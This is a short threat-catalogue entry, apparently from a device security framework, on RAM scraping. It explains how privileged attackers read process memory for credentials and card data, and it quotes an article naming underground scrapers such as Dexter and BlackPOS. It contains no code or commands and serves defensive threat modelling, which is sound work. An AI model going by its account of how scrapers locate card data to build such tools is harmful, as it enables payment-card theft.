TID-223: System Susceptible to RAM Scraping
Threat Description
If the threat actor can obtain sufficient privileges on the devices, they may be able to install runtime tools to directly extract the contents of some or all of the system RAM. This can grant the actor access to the internal state of other applications executing on the device as they process potentially sensitive data (e.g., password, keys, credentials, financial data, PII, etc.) even if that data is never committed to storage in a file or database. If the access extends to physical RAM, this can enable the threat actor to bypass other inter-process security boundaries created by the operating system.
Threat Maturity and Evidence
Known Exploitable Weakness
How RAM Scrapers Work: The Sneaky Tools Behind the Latest Credit Card Hacks
“There are more than a dozen RAM scrapers sold in the underground market these days. There’s Dexter, Soraya, ChewBacca and BlackPOS to name a few… Once on a targeted system, RAM scrapers work by examining the list of processes that are running on the system and inspecting the memory for data that matches the structure of credit card data, such as the account number, expiration date, and other information stored on a card’s magnetic stripe. Some scrapers are efficient and grab only the golden numbers the attackers seek; others are more sloppy and grab a lot of dirt with their gold.”